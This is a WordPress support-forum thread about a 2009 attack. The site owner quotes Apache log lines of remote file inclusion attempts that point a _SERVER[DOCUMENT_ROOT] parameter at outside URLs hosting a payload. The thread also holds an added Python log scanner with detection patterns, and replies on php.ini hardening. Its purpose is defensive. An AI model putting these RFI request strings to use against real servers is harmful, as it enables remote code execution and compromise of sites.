• I have a problem with someone trying attacks on my WordPress server. This server only runs the WordPress blog, nothing else.

    The server is
    CentOS 5 – 2.6.18.8-el5 kernel
    PHP 5.16
    Apache 2.2.3
    MySQL 5.0.22
    WordPress 2.8

    I noticed on the Wassup plug output that I was getting hits to this page on my site

    /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt?

    When I followed it, it tried to download a trojan which my PC s/w blocked. I checked the Apache access log and there have been a few of these in the last few hours:

    82.195.150.228 - - [15/Jul/2009:06:05:34 +1000] "GET /?_SERVER[DOCUMENT_ROOT]=https://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 35695
    82.195.150.228 - - [15/Jul/2009:06:58:01 +1000] "GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 35685
    67.15.206.26 - - [15/Jul/2009:07:18:33 +1000] "GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 35685
    192.168.0.2 - - [15/Jul/2009:09:47:12 +1000] "GET /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 34187
    201.232.54.48 - - [15/Jul/2009:11:22:57 +1000] "GET /?_SERVER[DOCUMENT_ROOT]=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 39381
    192.168.0.2 - - [15/Jul/2009:10:55:05 +1000] "GET /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 43329

    I have put my site into Maintenance mode until I can sort this out. I am guessing that a PHP variable has been changed, but the /etc/php.ini file hasn't been changed. I rebooted in case it was a variable in memory, but these attacks still seem to be happening.

    I have done some Google searches on this but haven't really found anything.

    Any thoughts or assistance would be appreciated.

    -todd-
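The access-log entries above show the classic remote file inclusion (RFI) pattern: a query parameter named after a PHP superglobal (`_SERVER[DOCUMENT_ROOT]`) whose value is a URL on another host. As an added example, not code from this thread or from the linked article, here is a small Python script that picks such requests out of an Apache access log and tallies them per source IP. The sample lines are constructed for the example (two are modelled on Todd's own entries, two are added benign or other traffic), and the `rfi_indicators` rules, the `LOG_RE` pattern and the function names are my own assumptions about what a reasonable filter looks like.

```python
import re
import sys
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log prefix: client IP, identd, user, timestamp,
# request line, status, size (anything after the size is ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A query value that is itself a URL is the hallmark of an RFI attempt.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Parameter names that try to overwrite PHP superglobals; this only has an
# effect on servers still running with register_globals=On.
SUPERGLOBAL_RE = re.compile(
    r'^(?:_SERVER|_REQUEST|_GET|_POST|_COOKIE|_ENV|GLOBALS)', re.IGNORECASE)

# Constructed sample log: the first two lines are modelled on the entries
# quoted in the post, the last two are added traffic to exercise the filter.
SAMPLE_LOG = """\
82.195.150.228 - - [15/Jul/2009:06:05:34 +1000] "GET /?_SERVER[DOCUMENT_ROOT]=https://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 35695
192.168.0.2 - - [15/Jul/2009:09:47:12 +1000] "GET /?_SERVERDOCUMENT_ROOT=https://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 34187
10.0.0.7 - - [15/Jul/2009:09:50:00 +1000] "GET /2009/07/hello-world/?replytocom=12 HTTP/1.1" 200 12345
203.0.113.9 - - [15/Jul/2009:12:01:02 +1000] "GET /index.php?page=http://example.invalid/inc.txt? HTTP/1.1" 404 512
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def rfi_indicators(request_path):
    """Return the (name, value) query parameters of a request that look like RFI attempts."""
    query = urlsplit(request_path).query
    suspicious = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value) or SUPERGLOBAL_RE.match(name):
            suspicious.append((name, value))
    return suspicious


def scan_log(text):
    """Return one finding per request that carries RFI indicators."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = rfi_indicators(rec["path"])
        if params:
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                "path": rec["path"], "params": params,
            })
    return findings


def count_by_ip(findings):
    """Number of flagged requests per source IP."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    # Usage: python rfi_scan.py /var/log/httpd/access_log  (falls back to the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_LOG
    found = scan_log(text)
    for f in found:
        outcome = "served 200" if f["status"] == 200 else f"status {f['status']}"
        detail = ", ".join(f"{n}={v}" for n, v in f["params"])
        print(f"{f['ts']}  {f['ip']:<15} {outcome}: {detail}")
    print("flagged requests by source IP:", dict(count_by_ip(found)))
```

A 200 in these entries only means WordPress answered the request with its normal front page, which is why the second reply is concerned but not alarmed. For the included URL to actually execute, the server would need register_globals enabled (so the query parameter overwrites `$_SERVER['DOCUMENT_ROOT']`) and remote URL handling enabled for includes, which is the functionality the php.ini hardening mentioned in the replies is meant to remove; checking those two settings in php.ini is the first thing to verify after running a scan like this.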

Viewing 2 replies - 1 through 2 (of 2 total)
  • Hello Todd, my own blog has been hit by this as well. I have still not figured out how to prevent these totally, but to at least stop them from redirecting, go here:

    https://blogingenuity.com/2009/05/14/remote-file-inclusion-rfi-attempts-detecting-tracking-and-mitigating/#more-369

    … and follow the instructions in “Stronger Security Hardening Via php.ini”

    I will post here again when I’ve figured out how to completely stop it on my own site.

    As always, be sure to backup any files you modify just in case it causes problems. Hope that helps!

  • As far as I can tell, those are classic Remote File Inclusion attempts. I would be concerned, though not overly, that the attempts are returning response codes of 200.

    aznbbj linked to my article, which is sort of a summary of the research I did on RFI attacks back when the same thing happened to me. It’s got a number of ways to mitigate the attacks, from the very simple and not-so-effective to editing of your php.ini file to remove functionality that the RFI attacks utilize.

    Hope it helps.

  • The topic ‘Possible PHP injection attack on WordPress site’ is closed to new replies.